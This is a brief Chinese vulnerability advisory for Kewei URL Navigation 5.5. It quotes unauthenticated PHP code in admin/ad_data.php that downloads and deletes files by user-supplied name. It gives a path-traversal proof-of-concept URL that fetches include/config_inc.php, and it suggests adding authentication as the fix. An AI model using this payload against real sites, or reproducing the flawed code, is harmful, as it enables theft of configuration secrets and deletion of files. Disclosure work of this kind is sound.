科威网址导航系统任意下载、删除文件漏洞

发布日期：2011-01.03
发布作者：心灵

影响版本：科威网址导航5.5

官方网站：http://www.kewei8.com

漏洞类型：设计缺陷

漏洞文件： admin/ad_data.php
备份还原数据库功能，没有进行管理登录验证

经典对白。。 看代码 ....
case 'down':
$filename or message('文件名不能为空');
file_down('../data/'.$filename);
break;
case 'delete':
unlink("../data/{$_GET['filenames']}");
message("文件<strong>{$_GET['filenames']}</strong>删除成功");
break;

漏洞测试：EXP

http://127.0.0.1/admin/ad_data.php?action=down&filename=../include/config_inc.php

漏洞修复：添加验证或者关注厂商补丁。

标签分类：